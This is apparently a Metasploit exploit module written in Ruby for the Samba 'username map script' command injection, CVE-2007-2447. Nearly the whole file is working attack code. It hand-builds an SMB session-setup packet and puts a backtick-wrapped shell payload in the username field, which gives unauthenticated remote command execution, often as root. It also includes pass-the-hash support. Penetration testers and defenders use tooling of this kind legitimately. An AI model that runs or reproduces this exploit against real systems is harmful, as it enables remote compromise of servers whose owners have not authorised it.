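##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Samba "username map script" command injection (CVE-2007-2447).
#
# The username sent in a SESSION_SETUP_ANDX request is handed to the
# administrator-configured "username map script" before any credential
# check happens, so shell metacharacters in the username run as whatever
# user smbd runs the script as.  No valid account is required.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SMB

  # Shorthands used by the customized session_setup_ntlmv1 below.
  CONST = Rex::Proto::SMB::Constants
  CRYPT = Rex::Proto::SMB::Crypt

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Samba "username map script" Command Execution',
      'Description'    => %q{
          This module exploits a command execution vulnerability in Samba
        versions 3.0.20 through 3.0.25rc3 when using the non-default
        "username map script" configuration option. By specifying a username
        containing shell meta characters, attackers can execute arbitrary
        commands.

        No authentication is needed to exploit this vulnerability since
        this option is used to map usernames prior to authentication!
      },
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2007-2447' ],
          [ 'OSVDB', '34700' ],
          [ 'BID', '23972' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
          [ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => true, # root or nobody user
      'Payload'        =>
        {
          # The command is placed inside a single username field; keep it
          # short and free of NOP padding (it is a shell string, not code).
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              # *_perl and *_ruby work if they are installed
              # mileage may vary from system to system..
            }
        },
      'Targets'        =>
        [
          [ "Automatic", { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 14 2007'))

    register_options(
      [
        Opt::RPORT(139)
      ], self.class)
  end

  # Send a single NTLMv1 SESSION_SETUP_ANDX carrying an arbitrary username.
  #
  # This is a trimmed-down copy of the library routine: it builds and sends
  # the request but deliberately never reads the reply. The server is not
  # expected to grant a session (the username is a shell payload, not an
  # account), and the command has already been run by the time any reply
  # would arrive.
  #
  # @param user   [String] username field; shell metacharacters are passed through untouched
  # @param pass   [String] either a plaintext password or a 65-char "LM:NT" hash pair
  # @param domain [String] domain field
  # @raise [XCEPT::NTLM1MissingChallenge] if negotiate did not yield a challenge
  def session_setup_ntlmv1(user = '', pass = '', domain = '')
    client = self.simple.client
    raise XCEPT::NTLM1MissingChallenge unless client.challenge_key

    # A 65-character "password" is treated as LM:NT hashes (pass-the-hash);
    # anything else is hashed from plaintext. Empty password => empty responses.
    if pass.length == 65
      hash_lm = CRYPT.e_p24([ pass.upcase()[0,32] ].pack('H42'), client.challenge_key)
      hash_nt = CRYPT.e_p24([ pass.upcase()[33,65] ].pack('H42'), client.challenge_key)
    else
      hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, client.challenge_key) : ''
      hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, client.challenge_key) : ''
    end

    # Data block: LM response, NT response, then NUL-terminated strings.
    data = ''
    data << hash_lm
    data << hash_nt
    data << user + "\x00"
    data << domain + "\x00"
    data << client.native_os + "\x00"
    data << client.native_lm + "\x00"

    pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct
    client.smb_defaults(pkt['Payload']['SMB'])

    pkt['Payload']['SMB'].v['Command']   = CONST::SMB_COM_SESSION_SETUP_ANDX
    pkt['Payload']['SMB'].v['Flags1']    = 0x18
    pkt['Payload']['SMB'].v['Flags2']    = 0x2001
    pkt['Payload']['SMB'].v['WordCount'] = 13

    pkt['Payload'].v['AndX']          = 255
    pkt['Payload'].v['MaxBuff']       = 0xffdf
    pkt['Payload'].v['MaxMPX']        = 2
    pkt['Payload'].v['VCNum']         = 1
    pkt['Payload'].v['PasswordLenLM'] = hash_lm.length
    pkt['Payload'].v['PasswordLenNT'] = hash_nt.length
    pkt['Payload'].v['Capabilities']  = 64
    pkt['Payload'].v['SessionKey']    = client.session_id
    pkt['Payload'].v['Payload']       = data

    client.smb_send(pkt.to_s)

    # No smb_recv here on purpose: the request itself is the exploit, and we
    # do not care whether the server ever answers it.
  end

  # Connect, negotiate without extended security (so a challenge is issued),
  # and fire the payload through the username field.
  def exploit
    connect

    # The username is spliced into the map script's command line by smbd, so
    # the backticks make the shell run our command. `nohup` is used so the
    # payload keeps running after smbd tears the session down. NOTE(review):
    # a payload containing its own unescaped backtick would end the
    # substitution early; the cmd payloads shipped with this module avoid that.
    username = "/=`nohup " + payload.encoded + "`"

    begin
      simple.client.negotiate(false)
      session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'])
    rescue ::Timeout::Error, XCEPT::LoginError
      # Expected: the server never completes a real session for this "user",
      # and may not respond at all. Neither case means the payload failed.
    end

    handler

    # Release the socket; the library disconnect tolerates an already-closed
    # or nil socket, so this is safe regardless of how the send ended.
    disconnect
  end
end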